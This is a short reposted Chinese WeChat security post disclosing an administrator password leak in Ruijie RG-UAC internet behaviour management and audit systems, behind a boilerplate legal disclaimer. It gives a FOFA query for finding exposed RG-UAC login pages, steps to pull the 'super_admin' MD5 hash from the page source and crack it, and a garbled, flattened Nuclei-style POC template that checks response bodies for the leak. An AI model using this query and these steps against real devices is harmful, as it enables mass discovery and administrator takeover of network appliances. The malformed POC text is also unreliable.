一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
fofa:title="RG-UAC登录页面"
四、漏洞复现:
打开系统——F12——搜索super_admin——md5解密即可
五、POC:
id: RG_UAC_leakPassinfo:name: RG-UAC_leakPassauthor: joyboyseverity: highdescription: http://xxx.xxx.xxxmetadata:: 1: title="RG-UAC登录页面"verified: truetags: RG,UArequests:raw:|-GET / HTTP/1.1Host: {{Hostname}}: truematchers:type: dslcondition: anddsl:'contains((body), "super_admin") && status_code == 200'
原文始发于微信公众号(fly的渗透学习笔记):RG-UAC统一上网行为管理与审计系统管理员密码泄露
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论